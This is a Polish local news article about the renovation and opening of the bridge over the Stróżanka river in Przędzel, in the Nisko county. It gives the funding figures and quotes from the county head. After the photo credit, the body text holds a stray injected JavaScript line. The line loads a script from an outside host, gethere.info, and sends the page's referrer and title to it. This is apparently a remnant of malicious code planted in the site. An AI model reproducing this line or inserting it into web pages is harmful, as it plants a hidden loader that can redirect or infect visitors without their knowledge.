W powiecie

Most w Przędzelu oddany do użytku

Most w Przędzelu oddany do użytku

Stary most na rzece Stróżanka w miejscowości Przędzel w gminie Rudnik nad Sanem zyskał nowe oblicze. Został gruntownie wyremontowany, położono nową nawierzchnię jezdni. Wszystko by zapewnić komfort jazdy i bezpieczeństwo użytkowników.

Przebudowa mostu była jedną z najpilniejszych tegorocznych inwestycji powiatu niżańskiego. Stan techniczny obiektu z każdym miesiącem się powiększał. Jak zaznacza starosta niżański, odłożenie prac w czasie wpłynęłoby nie tylko na bezpieczeństwo, ale również na koszt remontu.

mosr-2

-Stan techniczny mostu, podobnie jak innych tego typu obiektów, z roku na rok ulega pogorszeniu. Zareagowaliśmy w odpowiednim momencie. Za kilka lat koszty remontu mogłyby być znacznie wyższe. Jesteśmy spokojni, że most nie zagraża bezpieczeństwu – mówił Robert Bednarz, starosta niżański.

Dodał, że na remont mostu powiat niżański otrzymał ponad 200 tys. zł dofinansowania z Ministerstwa Infrastruktury i Budownictwa, zaś całkowity koszt remontu wyniósł ponad 440 tys. zł.
-Cieszymy się, że udało się zrealizować kolejne zadanie. Cieszy nad również fakt, że to kolejna inwestycja, na którą udało się pozyskać dofinansowanie – mówił Robert Bednarz.

mosr-3
Most w Przędzelu położony jest w ciągu drogi powiatowej nr 1059 R, łączy drogę powiatową nr 1060R Ulanów – Rudnik, drogę krajową nr 77 Lipnik – Przemyśl oraz drogę wojewódzką nr 858 Zarzecze – Szczebrzeszyn.
Świeżo wyremontowany most został pobłogosławiony przez proboszcza parafii pw. Matki Bożej Bolesnej w Przędzelu, ks. Leszka Kruzela. W uroczystym otwarciu obiektu wzięły udział władze samorządowe Powiatu Niżańskiego, burmistrz gminy Rudnik nad Sanem, Dyrektor Zarządu Dróg Powiatowych w Nisku, radni Rady Miejskiej w Rudniku nad Sanem, wykonawca inwestycji, a także pracownicy starostwa i ZDP w Nisku.

Małgorzata Petecka
fot. Starostwo Powiatowe w Nisku

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

W powiecie

Więcej w W powiecie

Zakończyła się kwalifikacja wojskowa w Powiecie Niżańskim

rni24.eu25 października 2021

Odbył się Konwent Powiatów Województwa Podkarpackiego

rni24.eu22 października 2021

Powiat pozyskał środki na zakup pakietów wyposażenia ucznia RCEZ w Nisku

rni24.eu21 października 2021

Zawody wędkarskie o Puchar Starosty Niżańskiego

rni24.eu21 października 2021

Posterunek Policji w Ulanowie w nowej odsłonie

rni24.eu21 października 2021

Jeżowe – Wycieczki z Ministerstwa Edukacji i Nauki

rni24.eu19 października 2021

Podpisanie i wmurowanie aktu erekcyjnego pod budowę Sądu w Nisku

rni24.eu19 października 2021

S19 Lasy Janowskie – Zdziary oddana do ruchu

rni24.eu18 października 2021

Szkoła Przysposabiająca do Pracy w Ulanowie zyskała nowe ogrodzenie

rni24.eu18 października 2021